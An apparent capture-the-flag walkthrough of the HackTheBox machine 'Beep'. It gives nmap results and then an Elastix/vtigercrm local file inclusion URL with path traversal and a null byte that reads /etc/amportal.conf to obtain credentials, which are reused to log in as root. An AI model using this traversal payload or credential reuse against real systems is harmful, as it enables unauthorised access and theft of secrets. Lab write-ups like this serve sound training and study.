Beep (Password Resuse and LFI)

Nmap Results →

Starting Nmap 7.80 ( <https://nmap.org> ) at 2020-07-08 14:39 EDT
Nmap scan report for 10.10.10.7
Host is up (0.11s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to <https://10.10.10.7/>
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP PIPELINING STLS AUTH-RESP-CODE EXPIRE(NEVER) LOGIN-DELAY(0) UIDL IMPLEMENTATION(Cyrus POP3 server v2) TOP USER RESP-CODES
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: OK Completed RIGHTS=kxte UIDPLUS NO URLAUTHA0001 IMAP4 SORT=MODSEQ LIST-SUBSCRIBED IMAP4rev1 CATENATE SORT LITERAL+ NAMESPACE CONDSTORE BINARY LISTEXT THREAD=REFERENCES ANNOTATEMORE QUOTA THREAD=ORDEREDSUBJECT MAILBOX-REFERRALS X-NETSCAPE MULTIAPPEND CHILDREN UNSELECT ACL RENAME ID IDLE STARTTLS ATOMIC
443/tcp   open  ssl/https?
|_ssl-date: 2020-07-08T18:50:31+00:00; +4m48s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).

So traversing over to the main http page it redirects us to the https version of the page and we are greeted with a login page and then we can try some default credentials and some basic sql injection techniques and we have no luck trying that so lets just try searchsploit on the login service its called elastix here and we found this exploit →

https://www.exploit-db.com/exploits/37637

So all we have to do now is to traverse to

10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

and we see a lot of jumbeled text so to make it look better lets view source and it will be more organized and we find a username called asterik and a password lets try it on all service .

I tried to ssh into the IP with the password and username but that didnt work. And lets try now to use the same password with the username admin and root and see if there is a possibility of password reuse and gg we got in with root.